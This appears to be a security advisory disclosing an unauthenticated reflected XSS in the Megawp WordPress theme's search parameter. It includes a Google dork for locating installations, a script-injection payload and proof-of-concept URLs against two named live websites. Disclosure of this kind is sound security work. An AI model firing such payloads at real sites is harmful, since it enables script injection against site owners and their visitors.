Megawp WordPress Theme - Unauthenticated Reflected XSS

2021.12.06

EbRaHiM-GHiaSi (IR)

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

- # VULNERABILITY: Megawp WordPress Theme - Unauthenticated Reflected XSS
- # GOOGLE DORK: Megawp-Theme
- # DATE: 2021-02-10
- # SECURITY RESEARCHER: EbRaHiM-VaKeR [ https://ebrahim-ghiasi.ir ]
- # VENDOR: Megawp-Theme [ http://megawp.almastheme.com/megawp-demos/ ]
- # SOFTWARE VERSION: <= 1
- # SOFTWARE LINK: https://www.zhaket.com/web/megawp-wordpress-theme
- # CVE: N/A
*/
### -- [ Info: ]
[i] An Unauthenticated Reflected XSS vulnerability was discovered in the Megawp-Theme for WordPress.
[i] Vulnerable parameter(s): ?s=
### -- [ Impact: ]
[~] code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.
### -- [ Payload: ]
[$] ?s="><script>alert(`hacked`)</script>
### -- [ PoC | Unauthenticated Reflected XSS | Search query: ]
[!] https://lms.golvani.ir/?s=%22%3E%3Cscript%3Ealert(`hacked`)%3C/script%3E
[!] https://baameshimi.ir/?s=%22%3E%3Cscript%3Ealert(`hacked`)%3C/script%3E
### -- [ Contacts: ]
[+] Website: ebrahim-ghiasi.ir
[+] Telegram: @hajit00n

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Megawp WordPress Theme - Unauthenticated Reflected XSS

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.